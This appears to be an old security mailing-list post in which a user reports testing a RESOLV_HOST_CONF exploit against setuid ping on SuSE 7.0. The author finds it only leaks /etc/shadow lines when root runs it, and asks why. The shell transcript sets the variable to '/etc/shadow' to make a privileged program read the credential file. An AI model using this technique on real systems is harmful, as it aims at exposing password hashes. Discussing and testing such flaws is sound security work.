I tried the exploit on a SuSE 7.0 host, if root starts ping/traceroute..., the /etc/shadow file is being shown, if a normal user exports RESOLV_HOST_CONF, nothing unnormal happens:
[EMAIL PROTECTED]:~ > ls -l /bin/ping -rwsr-xr-x 1 root root 23k Okt 4 12:37 /bin/ping [EMAIL PROTECTED]:~ > ldd /bin/ping libc.so.6 => /lib/libc.so.6 (0x40021000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) [EMAIL PROTECTED]:~ > export RESOLV_HOST_CONF='/etc/shadow' [EMAIL PROTECTED]:~ > ping localhost PING localhost (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.189 ms <-snip-> [EMAIL PROTECTED]:~ > spock:~ # export RESOLV_HOST_CONF='/etc/shadow' spock:~ # ping localhost /etc/shadow: line 1: bad command `root:blabla:9473:0:10000::::' <-snip-> /etc/shadow: line 47: bad command `bj:blabla:11194:0:99999:7:0::' PING localhost (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.191 ms <-snip-> spock:~ # Any idea why ? Does the variable not apply for normal users ? Björn